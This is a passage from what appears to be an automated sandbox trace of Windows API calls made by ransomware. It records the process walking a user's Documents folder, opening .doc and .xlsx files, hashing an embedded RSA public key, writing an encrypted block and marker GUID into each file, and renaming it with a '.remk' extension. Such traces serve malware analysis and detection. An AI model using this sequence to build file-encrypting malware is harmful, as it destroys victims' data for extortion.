(HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc678 [0236.037] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.037] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc630 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc690 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0236.038] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.038] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc6a8 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc648 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc618 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc678 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.039] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.039] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0236.040] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1102c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.040] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.040] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.040] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.041] CloseHandle (hObject=0x640) returned 1 [0236.042] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe0) returned 0x6a2d00 [0236.043] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8f0) returned 0x37bd408 [0236.043] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\1Usub D99LlYwn35U.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\1usub d99llywn35u.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\1Usub D99LlYwn35U.doc.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\1usub d99llywn35u.doc.remk")) returned 1 [0236.045] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe664f690, ftCreationTime.dwHighDateTime=0x1d5df03, ftLastAccessTime.dwLowDateTime=0xebd4e370, ftLastAccessTime.dwHighDateTime=0x1d5dcfa, ftLastWriteTime.dwLowDateTime=0xebd4e370, ftLastWriteTime.dwHighDateTime=0x1d5dcfa, nFileSizeHigh=0x0, nFileSizeLow=0x5a8f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5tUVR.doc", cAlternateFileName="")) returned 1 [0236.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.045] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\5tUVR.doc") returned=".doc" [0236.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\5tUVR.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\5tuvr.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.047] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=23183) returned 1 [0236.047] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.050] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5a69, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.050] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.052] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.052] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x5a8f, lpOverlapped=0x0) returned 1 [0236.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.053] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.053] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.053] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.054] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.054] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.054] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.054] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.054] GetLastError () returned 0x0 [0236.054] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.054] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.054] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.054] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.054] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.055] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.055] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.055] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x5a8f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.055] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.055] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.056] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.056] CloseHandle (hObject=0x640) returned 1 [0236.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0236.057] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\5tUVR.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\5tuvr.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\5tUVR.doc.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\5tuvr.doc.remk")) returned 1 [0236.059] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x213419a0, ftCreationTime.dwHighDateTime=0x1d5e48a, ftLastAccessTime.dwLowDateTime=0xcf6d2850, ftLastAccessTime.dwHighDateTime=0x1d5dfc0, ftLastWriteTime.dwLowDateTime=0xcf6d2850, ftLastWriteTime.dwHighDateTime=0x1d5dfc0, nFileSizeHigh=0x0, nFileSizeLow=0x306a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aYykKL9sNmuS205lNQxb.xlsx", cAlternateFileName="AYYKKL~1.XLS")) returned 1 [0236.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0236.059] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11e) returned 0x3192918 [0236.059] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\aYykKL9sNmuS205lNQxb.xlsx") returned=".xlsx" [0236.059] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\eBkpfXutqqrq6h\\t648 Z2T0mST-97jBqS\\aYykKL9sNmuS205lNQxb.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\ebkpfxutqqrq6h\\t648 z2t0mst-97jbqs\\ayykkl9snmus205lnqxb.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.060] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=12394) returned 1 [0236.060] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.063] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x3044, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.063] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.065] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.065] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.065] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.065] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x306a, lpOverlapped=0x0) returned 1 [0236.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.066] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0236.067] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.067] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.067] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.067] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.067] GetLastError () returned 0x0 [0236.067] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.067] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.067] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.067] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.067] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.067] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x3070) returned 0x37c6278 [0236.068] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.068] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325d340 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc600 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325dda8 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc618 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc648 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc660 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.068] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc648 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc660 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc6a8 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.069] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc6a8 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc660 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc648 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.069] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 